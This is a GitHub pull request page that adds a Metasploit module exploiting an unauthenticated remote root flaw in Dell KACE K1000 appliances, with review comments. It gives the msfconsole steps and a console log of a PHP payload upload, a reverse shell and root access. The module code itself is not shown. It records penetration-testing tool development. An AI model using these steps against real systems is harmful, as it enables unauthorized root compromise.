Add Dell Kace K1000 unauthenticated remote root exploit #6773

merged 1 commit into from Apr 13, 2016


None yet

3 participants

bcoles commented Apr 12, 2016

Add Dell Kace K1000 unauthenticated remote root exploit for versions 5.0 to 5.3, 5.4 prior to 5.4.76849 and 5.5 prior to 5.5.90547.


  • Use your Dell Support user account to locate and download the outdated and vulnerable K1000 trial appliance.
  • $ msfconsole
  • > use exploit/unix/http/dell_kace_k1000_upload
  • > set rhost <rhost>
  • > set verbose true
  • > check
  • > run
  • > id


msf > use exploit/unix/http/dell_kace_k1000_upload 
msf exploit(dell_kace_k1000_upload) > show options

Module options (exploit/unix/http/dell_kace_k1000_upload):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(dell_kace_k1000_upload) > set rhost
rhost =>
msf exploit(dell_kace_k1000_upload) > set verbose true
verbose => true
msf exploit(dell_kace_k1000_upload) > check

[*] Found Dell KACE K1000 version 5.3.53053
[+] The target is vulnerable.
msf exploit(dell_kace_k1000_upload) > run

[*] Started reverse TCP handler on 
[*] Uploading .pKWbnhT43Wh.php (620 bytes)
[+] Payload uploaded successfully
[*] Command shell session 1 opened ( -> at 2016-04-12 11:44:13 -0400
[+] Payload executed successfully

uid=0(root) gid=0(wheel) groups=0(wheel)
uname -a
FreeBSD kbox 7.0-STABLE FreeBSD 7.0-STABLE #0: Thu May  1 14:53:40 UTC 2008  amd64
wvu-r7 commented Apr 12, 2016

Yay, FreeBSD. :)


@bcoles Is there a virtual appliance that I can download and test? It looks like I can only test their lab machine.

bcoles commented Apr 13, 2016

@wchen-r7 You can download a trial in OVF format from the Support portal.

These versions are likely vulnerable:

  • hxxps://
  • hxxps://

A valid support Maintenance contract is required to download the old versions. Fortunately we have a pcap, so we can land this. Thanks @bcoles


Code looks good. I will land it.

@wchen-r7 wchen-r7 self-assigned this Apr 13, 2016
@wchen-r7 wchen-r7 merged commit b61175c into rapid7:master Apr 13, 2016

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
@wchen-r7 wchen-r7 added a commit that referenced this pull request Apr 13, 2016
@wchen-r7 wchen-r7 Land #6773, Add Dell Kace K1000 unauthenticated remote root exploit c52a639
@bcoles bcoles deleted the bcoles:dell_kace_k1000_upload branch Apr 22, 2016
@h00die h00die referenced this pull request Jun 8, 2016

PoC for Dell KACE K1000 #5128

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment